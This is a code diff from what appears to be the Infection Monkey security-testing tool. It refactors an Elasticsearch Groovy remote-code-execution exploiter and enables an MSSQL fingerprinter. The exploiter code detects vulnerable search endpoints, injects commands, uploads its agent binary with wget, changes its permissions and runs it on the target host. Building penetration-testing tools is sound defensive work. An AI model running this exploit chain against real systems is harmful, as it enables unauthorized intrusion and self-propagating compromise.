Refactored elastic for latest framework changes

infection_monkey/exploit/elasticgroovy.py

@@ -8,11 +8,9 @@ import json
 import logging
 import requests
 from network.elasticfinger import ES_SERVICE, ES_PORT
-from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
 from exploit.web_rce import WebRCE
-from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED
+from model import WGET_HTTP_UPLOAD
 
-import copy
 import re
 
 __author__ = 'danielg'
@@ -49,48 +47,42 @@ class ElasticGroovyExploiter(WebRCE):
         if ES_SERVICE not in self.host.services:
             LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr)
             return False
-        # We need a reference to the exploiter for WebRCE framework to use
-        exploiter = self.exploit
         # Build url from host and elastic port(not https)
-        urls = WebRCE.build_potential_urls(self.host, [[ES_PORT, False]], ['_search?pretty'])
+        urls = self.build_potential_urls([[ES_PORT, False]], ['_search?pretty'])
         vulnerable_urls = []
         for url in urls:
-            if WebRCE.check_if_exploitable(exploiter, url):
+            if self.check_if_exploitable(url):
                 vulnerable_urls.append(url)
         self._exploit_info['vulnerable_urls'] = vulnerable_urls
         if not vulnerable_urls:
             return False
 
-        # Extra escaping required:
-        config = copy.deepcopy(self._config)
-        config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe"
-        config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe"
-
-        if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config):
+        if self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
             LOG.info("Host %s was already infected under the current configuration, done" % self.host)
             return True
 
-        if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
+        if not self.set_host_arch(vulnerable_urls[0]):
             return False
 
         commands = {'windows': self.RDP_CMDLINE_HTTP,
                     'linux': WGET_HTTP_UPLOAD}
 
-        data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands)
+        data = self.upload_monkey(vulnerable_urls[0], commands)
 
         # We can't use 'if not' because response may be ''
-        if data is not False and data['response'] == False:
+        if data is not False and data['response'] is False:
             return False
 
-        if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False:
+        if self.change_permissions(vulnerable_urls[0], data['path']) is False:
             return False
 
-        if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False:
+        if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False:
             return False
 
         return True
 
     def exploit(self, url, command):
+        command = re.sub(r"\\", r"\\\\\\\\", command)
         payload = self.JAVA_CMD % command
         response = requests.get(url, data=payload)
         result = self.get_results(response)

infection_monkey/network/mssql_fingerprint.py

@@ -29,8 +29,6 @@ class MSSQLFinger(HostFinger):
                 Discovered server information written to the Host info struct.
                 True if success, False otherwise.
         """
-        # TODO remove auto-return
-        return False
         assert isinstance(host, VictimHost)
 
         # Create a UDP socket and sets a timeout